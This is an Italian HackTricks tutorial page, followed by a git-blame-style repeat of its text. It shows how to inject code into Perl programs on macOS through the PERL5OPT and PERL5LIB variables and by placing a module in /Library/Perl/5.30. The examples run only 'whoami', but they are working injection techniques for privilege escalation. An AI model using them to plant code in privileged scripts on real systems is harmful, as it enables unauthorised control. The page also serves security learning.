hacktricks/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-perl-applications-injection.md

# Iniezione di Applicazioni Perl su macOS

<details>

<summary><strong>Impara l'hacking su AWS da zero a esperto con</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Esperto Red Team AWS di HackTricks)</strong></a><strong>!</strong></summary>

Altri modi per supportare HackTricks:

* Se desideri vedere la tua **azienda pubblicizzata su HackTricks** o **scaricare HackTricks in PDF** Controlla i [**PIANI DI ABBONAMENTO**](https://github.com/sponsors/carlospolop)!
* Ottieni il [**merchandising ufficiale di PEASS & HackTricks**](https://peass.creator-spring.com)
* Scopri [**La Famiglia PEASS**](https://opensea.io/collection/the-peass-family), la nostra collezione di [**NFT esclusivi**](https://opensea.io/collection/the-peass-family)
* **Unisciti al** 💬 [**gruppo Discord**](https://discord.gg/hRep4RUj7f) o al [**gruppo telegram**](https://t.me/peass) o **seguici** su **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Condividi i tuoi trucchi di hacking inviando PR a** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.

</details>

## Attraverso le variabili d'ambiente `PERL5OPT` e `PERL5LIB`

Utilizzando la variabile d'ambiente PERL5OPT è possibile far eseguire a perl comandi arbitrari.\
Ad esempio, crea questo script:

{% code title="test.pl" %}
```perl
#!/usr/bin/perl
print "Hello from the Perl script!\n";
```
{% endcode %}

Ora **esporta la variabile di ambiente** ed esegui lo script **perl**:
```bash
export PERL5OPT='-Mwarnings;system("whoami")'
perl test.pl # This will execute "whoami"
```
Un'altra opzione è creare un modulo Perl (ad esempio `/tmp/pmod.pm`):

{% code title="/tmp/pmod.pm" %}
```perl
#!/usr/bin/perl
package pmod;
system('whoami');
1; # Modules must return a true value
```
{% endcode %}

E poi utilizzare le variabili di ambiente:
```bash
PERL5LIB=/tmp/ PERL5OPT=-Mpmod
```
## Attraverso le dipendenze

È possibile elencare l'ordine delle cartelle delle dipendenze di Perl in esecuzione:
```bash
perl -e 'print join("\n", @INC)'
```
Che restituirà qualcosa del genere:
```bash
/Library/Perl/5.30/darwin-thread-multi-2level
/Library/Perl/5.30
/Network/Library/Perl/5.30/darwin-thread-multi-2level
/Network/Library/Perl/5.30
/Library/Perl/Updates/5.30.3
/System/Library/Perl/5.30/darwin-thread-multi-2level
/System/Library/Perl/5.30
/System/Library/Perl/Extras/5.30/darwin-thread-multi-2level
/System/Library/Perl/Extras/5.30
```
Alcune delle cartelle restituite non esistono nemmeno, tuttavia, **`/Library/Perl/5.30`** esiste, non è protetto da SIP ed è posizionato prima delle cartelle protette da SIP. Pertanto, qualcuno potrebbe abusare di quella cartella per aggiungere dipendenze di script in modo che uno script Perl ad alto privilegio le carichi.

{% hint style="warning" %}
Tuttavia, nota che **è necessario essere root per scrivere in quella cartella** e al giorno d'oggi otterrai questo **prompt TCC**:
{% endhint %}

<figure><img src="../../../.gitbook/assets/image (1) (1) (1) (1) (1) (1) (1).png" alt="" width="244"><figcaption></figcaption></figure>

Ad esempio, se uno script sta importando **`use File::Basename;`** sarebbe possibile creare `/Library/Perl/5.30/File/Basename.pm` per eseguire codice arbitrario.

## References

* [https://www.youtube.com/watch?v=zxZesAN-TEk](https://www.youtube.com/watch?v=zxZesAN-TEk)

<details>

<summary><strong>Impara l'hacking su AWS da zero a esperto con</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>

Altri modi per supportare HackTricks:

* Se desideri vedere la tua **azienda pubblicizzata in HackTricks** o **scaricare HackTricks in PDF** controlla i [**PIANI DI ABBONAMENTO**](https://github.com/sponsors/carlospolop)!
* Ottieni il [**merchandising ufficiale PEASS & HackTricks**](https://peass.creator-spring.com)
* Scopri [**The PEASS Family**](https://opensea.io/collection/the-peass-family), la nostra collezione di [**NFT esclusivi**](https://opensea.io/collection/the-peass-family)
* **Unisciti al** 💬 [**gruppo Discord**](https://discord.gg/hRep4RUj7f) o al [**gruppo telegram**](https://t.me/peass) o **seguici** su **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Condividi i tuoi trucchi di hacking inviando PR ai** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.

</details>
Translated ['generic-methodologies-and-resources/external-recon-methodol 2024-02-23 16:37:30 +00:00			`# Iniezione di Applicazioni Perl su macOS`
GITBOOK-4173: change request with no subject merged in GitBook 2023-12-04 09:24:40 +00:00
			`<details>`

Translated ['README.md', 'backdoors/salseo.md', 'cryptography/certificat 2024-03-17 16:26:31 +00:00			`<summary><strong>Impara l'hacking su AWS da zero a esperto con</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Esperto Red Team AWS di HackTricks)</strong></a><strong>!</strong></summary>`
GITBOOK-4173: change request with no subject merged in GitBook 2023-12-04 09:24:40 +00:00
Translated to Italian 2024-02-10 13:03:23 +00:00			`Altri modi per supportare HackTricks:`
arte2 2024-01-04 09:09:56 +00:00
Translated ['README.md', 'backdoors/salseo.md', 'cryptography/certificat 2024-03-17 16:26:31 +00:00			`* Se desideri vedere la tua azienda pubblicizzata su HackTricks o scaricare HackTricks in PDF Controlla i [PIANI DI ABBONAMENTO](https://github.com/sponsors/carlospolop)!`
Translated to Italian 2024-02-10 13:03:23 +00:00			`* Ottieni il [merchandising ufficiale di PEASS & HackTricks](https://peass.creator-spring.com)`
Translated ['generic-methodologies-and-resources/external-recon-methodol 2024-02-23 16:37:30 +00:00			`* Scopri [La Famiglia PEASS](https://opensea.io/collection/the-peass-family), la nostra collezione di [NFT esclusivi](https://opensea.io/collection/the-peass-family)`
Translated ['README.md', 'backdoors/salseo.md', 'cryptography/certificat 2024-03-17 16:26:31 +00:00			`* Unisciti al 💬 [gruppo Discord](https://discord.gg/hRep4RUj7f) o al [gruppo telegram](https://t.me/peass) o seguici su Twitter 🐦 [@carlospolopm](https://twitter.com/hacktricks\_live).`
			`* Condividi i tuoi trucchi di hacking inviando PR a [HackTricks](https://github.com/carlospolop/hacktricks) e [HackTricks Cloud](https://github.com/carlospolop/hacktricks-cloud) github repos.`
GITBOOK-4173: change request with no subject merged in GitBook 2023-12-04 09:24:40 +00:00
			`</details>`

Translated ['generic-methodologies-and-resources/external-recon-methodol 2024-02-23 16:37:30 +00:00			## Attraverso le variabili d'ambiente `PERL5OPT` e `PERL5LIB`
GITBOOK-4173: change request with no subject merged in GitBook 2023-12-04 09:24:40 +00:00
Translated ['generic-methodologies-and-resources/external-recon-methodol 2024-02-23 16:37:30 +00:00			`Utilizzando la variabile d'ambiente PERL5OPT è possibile far eseguire a perl comandi arbitrari.\`
Translated ['README.md', 'backdoors/salseo.md', 'cryptography/certificat 2024-03-29 21:03:31 +00:00			`Ad esempio, crea questo script:`
GITBOOK-4173: change request with no subject merged in GitBook 2023-12-04 09:24:40 +00:00
			`{% code title="test.pl" %}`
			```perl
			`#!/usr/bin/perl`
			`print "Hello from the Perl script!\n";`
			```
			`{% endcode %}`

Translated to Italian 2024-02-10 13:03:23 +00:00			`Ora esporta la variabile di ambiente ed esegui lo script perl:`
GITBOOK-4173: change request with no subject merged in GitBook 2023-12-04 09:24:40 +00:00			```bash
			`export PERL5OPT='-Mwarnings;system("whoami")'`
			`perl test.pl # This will execute "whoami"`
			```
Translated ['generic-methodologies-and-resources/external-recon-methodol 2024-02-23 16:37:30 +00:00			Un'altra opzione è creare un modulo Perl (ad esempio `/tmp/pmod.pm`):
GITBOOK-4192: change request with no subject merged in GitBook 2023-12-16 13:28:14 +00:00
			`{% code title="/tmp/pmod.pm" %}`
			```perl
			`#!/usr/bin/perl`
			`package pmod;`
			`system('whoami');`
			`1; # Modules must return a true value`
			```
			`{% endcode %}`

Translated ['generic-methodologies-and-resources/external-recon-methodol 2024-02-23 16:37:30 +00:00			`E poi utilizzare le variabili di ambiente:`
GITBOOK-4192: change request with no subject merged in GitBook 2023-12-16 13:28:14 +00:00			```bash
			`PERL5LIB=/tmp/ PERL5OPT=-Mpmod`
			```
Translated to Italian 2024-02-10 13:03:23 +00:00			`## Attraverso le dipendenze`
GITBOOK-4192: change request with no subject merged in GitBook 2023-12-16 13:28:14 +00:00
Translated to Italian 2024-02-10 13:03:23 +00:00			`È possibile elencare l'ordine delle cartelle delle dipendenze di Perl in esecuzione:`
GITBOOK-4173: change request with no subject merged in GitBook 2023-12-04 09:24:40 +00:00			```bash
			`perl -e 'print join("\n", @INC)'`
			```
Translated ['generic-methodologies-and-resources/external-recon-methodol 2024-02-23 16:37:30 +00:00			`Che restituirà qualcosa del genere:`
GITBOOK-4173: change request with no subject merged in GitBook 2023-12-04 09:24:40 +00:00			```bash
			`/Library/Perl/5.30/darwin-thread-multi-2level`
			`/Library/Perl/5.30`
			`/Network/Library/Perl/5.30/darwin-thread-multi-2level`
			`/Network/Library/Perl/5.30`
			`/Library/Perl/Updates/5.30.3`
			`/System/Library/Perl/5.30/darwin-thread-multi-2level`
			`/System/Library/Perl/5.30`
			`/System/Library/Perl/Extras/5.30/darwin-thread-multi-2level`
			`/System/Library/Perl/Extras/5.30`
			```
Translated ['README.md', 'backdoors/salseo.md', 'cryptography/certificat 2024-03-17 16:26:31 +00:00			Alcune delle cartelle restituite non esistono nemmeno, tuttavia, `/Library/Perl/5.30` esiste, non è protetto da SIP ed è posizionato prima delle cartelle protette da SIP. Pertanto, qualcuno potrebbe abusare di quella cartella per aggiungere dipendenze di script in modo che uno script Perl ad alto privilegio le carichi.
GITBOOK-4173: change request with no subject merged in GitBook 2023-12-04 09:24:40 +00:00
GITBOOK-4192: change request with no subject merged in GitBook 2023-12-16 13:28:14 +00:00			`{% hint style="warning" %}`
Translated ['README.md', 'backdoors/salseo.md', 'cryptography/certificat 2024-03-29 21:03:31 +00:00			`Tuttavia, nota che è necessario essere root per scrivere in quella cartella e al giorno d'oggi otterrai questo prompt TCC:`
GITBOOK-4192: change request with no subject merged in GitBook 2023-12-16 13:28:14 +00:00			`{% endhint %}`

Translated ['README.md', 'backdoors/salseo.md', 'cryptography/certificat 2024-03-29 21:03:31 +00:00			`<figure><img src="../../../.gitbook/assets/image (1) (1) (1) (1) (1) (1) (1).png" alt="" width="244"><figcaption></figcaption></figure>`
GITBOOK-4173: change request with no subject merged in GitBook 2023-12-04 09:24:40 +00:00
Translated ['generic-methodologies-and-resources/external-recon-methodol 2024-02-23 16:37:30 +00:00			Ad esempio, se uno script sta importando `use File::Basename;` sarebbe possibile creare `/Library/Perl/5.30/File/Basename.pm` per eseguire codice arbitrario.
GITBOOK-4173: change request with no subject merged in GitBook 2023-12-04 09:24:40 +00:00
Translated ['generic-methodologies-and-resources/external-recon-methodol 2024-02-23 16:37:30 +00:00			`## References`
GITBOOK-4173: change request with no subject merged in GitBook 2023-12-04 09:24:40 +00:00
			`* [https://www.youtube.com/watch?v=zxZesAN-TEk](https://www.youtube.com/watch?v=zxZesAN-TEk)`

			`<details>`

Translated ['README.md', 'backdoors/salseo.md', 'cryptography/certificat 2024-03-29 21:03:31 +00:00			`<summary><strong>Impara l'hacking su AWS da zero a esperto con</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>`
GITBOOK-4173: change request with no subject merged in GitBook 2023-12-04 09:24:40 +00:00
Translated to Italian 2024-02-10 13:03:23 +00:00			`Altri modi per supportare HackTricks:`
arte2 2024-01-04 09:09:56 +00:00
Translated ['README.md', 'backdoors/salseo.md', 'cryptography/certificat 2024-03-29 21:03:31 +00:00			`* Se desideri vedere la tua azienda pubblicizzata in HackTricks o scaricare HackTricks in PDF controlla i [PIANI DI ABBONAMENTO](https://github.com/sponsors/carlospolop)!`
Translated ['generic-methodologies-and-resources/external-recon-methodol 2024-02-23 16:37:30 +00:00			`* Ottieni il [merchandising ufficiale PEASS & HackTricks](https://peass.creator-spring.com)`
Translated ['README.md', 'backdoors/salseo.md', 'cryptography/certificat 2024-03-29 21:03:31 +00:00			`* Scopri [The PEASS Family](https://opensea.io/collection/the-peass-family), la nostra collezione di [NFT esclusivi](https://opensea.io/collection/the-peass-family)`
Translated ['generic-methodologies-and-resources/external-recon-methodol 2024-02-23 16:37:30 +00:00			`* Unisciti al 💬 [gruppo Discord](https://discord.gg/hRep4RUj7f) o al [gruppo telegram](https://t.me/peass) o seguici su Twitter 🐦 [@carlospolopm](https://twitter.com/hacktricks\_live).`
Translated ['README.md', 'backdoors/salseo.md', 'cryptography/certificat 2024-03-17 16:26:31 +00:00			`* Condividi i tuoi trucchi di hacking inviando PR ai [HackTricks](https://github.com/carlospolop/hacktricks) e [HackTricks Cloud](https://github.com/carlospolop/hacktricks-cloud) github repos.`
GITBOOK-4173: change request with no subject merged in GitBook 2023-12-04 09:24:40 +00:00
			`</details>`